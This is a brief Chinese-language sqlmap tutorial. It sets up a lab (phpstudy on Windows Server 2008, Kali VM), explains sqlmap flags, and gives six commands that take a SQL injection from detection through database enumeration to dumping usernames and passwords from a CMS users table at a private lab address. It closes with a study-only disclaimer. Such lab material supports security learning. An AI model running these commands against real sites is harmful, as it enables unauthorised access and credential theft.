環境搭建
網站搭建–window server 2008 phpstudy
測試機 kali虛擬機
Sql map參數
參數 | 含義 |
---|---|
-u “url” | 檢測注入點 |
–dbs | 列出所有數據庫的名字 |
–current-db | 列出當前數據庫的名字 |
-D | 指定一個數據庫 |
–tables | 列出表名 |
-T | 指定表名 |
–columns | 列出所有的字段名 |
-C | 指定字段 |
–dump | 列出字段內容 |
第一步 檢測注入點
[sqlmap -u http://192.168.139.136/cms/show.php?id=33
]
第二步 列出所有數據庫的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --dbs
]
第三步 列出當前數據庫的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --current-db
]
第四步 列出表名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables
]
第五步列出所有的字段名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables -T cms_users --columns
]
第六步 列出字段內容
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms -T cms_users -C "username,password" --dump
]
免責聲明
本文檔供學習,請使用者注意使用環境並遵守國家相關法律法規!
由於使用不當造成的後果上傳者概不負責!